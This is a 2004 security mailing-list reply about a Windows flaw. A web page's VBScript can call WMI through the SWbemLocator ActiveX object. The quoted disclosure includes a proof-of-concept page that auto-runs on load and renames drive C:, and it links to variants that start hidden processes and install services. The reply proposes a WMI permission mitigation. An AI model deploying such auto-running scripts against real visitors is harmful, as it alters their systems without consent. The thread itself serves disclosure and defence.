[SPAM] RE: WbemScripting.SWbemLocator - createobject allows... EVERYTHING!

["jasonk" <jasonk () bluedevel com>]

Hi Bartosz,

If you run as an administrator, and allow unrestricted ActiveX access, this
is no different to any other exploit.  If the activex was a trojan and you
allowed full scripted access, there is the same effect.

However I imagine this can be used with some crossing the boundaries to My
Computer, and then an attack effected much more easily than a "known file
location" vuln.

For a temporary fix, under xp:

Open Computer Management, Services and Applications-> right click WMI
Control, choose Properties.

Then, Deny "provider write" and "execute methods" for the cimv2 namespace.
This quite possibly WILL affect other applications on the computer, but
should prevent this from occuring.

Otherwise, I don't know enough about WMI to be able to say how to disable
certain applications.  Anyone help?

jasonk
> -----Original Message-----
> From: Bartosz Kwitkowski [mailto:bartosz () wb pl] 
> Sent: Friday, 5 March 2004 8:24 AM
> To: vuln-dev () securityfocus com
> Subject: WbemScripting.SWbemLocator - createobject allows... 
> EVERYTHING!
>
>
>
> I would like to dedicate this discovery to Justyna.
>
>
>
> WbemScripting.SWbemLocator - this object has access to WMI in 
> Win XP ( i have Prof fully patched). , 2003 , any NT? I 
> think, this vuln concerns all Windows where we can find 
> WbemScripting.SWbemLocator.
>
>
>
> I would not like to publish more exploits because of their 
> dangerous use
>
>
>
> more examples are at:
>
>
>
> http://wb.pl/bartosz/wbem/process.htm - create process in 
> hidden window
>
> http://wb.pl/bartosz/wbem/installservice.htm - installs service
>
> http://wb.pl/bartosz/wbem/changevolume.htm - changes volume of C:
>
>
>
> HOME PAGE - http://wb.pl/bartosz/
>
>
>
> example source:
>
> <HTML>
>
> <HEAD>
>
> <TITLE>Change volume of disk</TITLE>
>
> &lt;SCRIPT LANGUAGE="VBScript"> 
>
>    
>
> // I would like to dedicate this discovery to Justyna.
>
>
>
>    Sub window_onload
>
>    const impersonation = 3
>
>
>
>
>
>
>
>    Set Locator = CreateObject("WbemScripting.SWbemLocator")
>
>    Set Service = Locator.ConnectServer()
>
>    Service.Security_.ImpersonationLevel=impersonation
>
>
>
>    Set Process = Service.Get("Win32_LogicalDisk=""C:""")
>
>  
>
>
>
> Process.VolumeName = "bartosz kwitkowski
>
> Process.Put_
>
>
>
>
>
> end sub
>
>
>
> &lt;/SCRIPT&gt;
>
> </HEAD>
>
> <BODY>
>
> I would like to dedicate this discovery to Justyna.
>
> </BODY>
>
> </HTML>
>
>
>
>
>
> ANY QUESTIONS? ASK ME!

Attachment: smime.p7s
Description: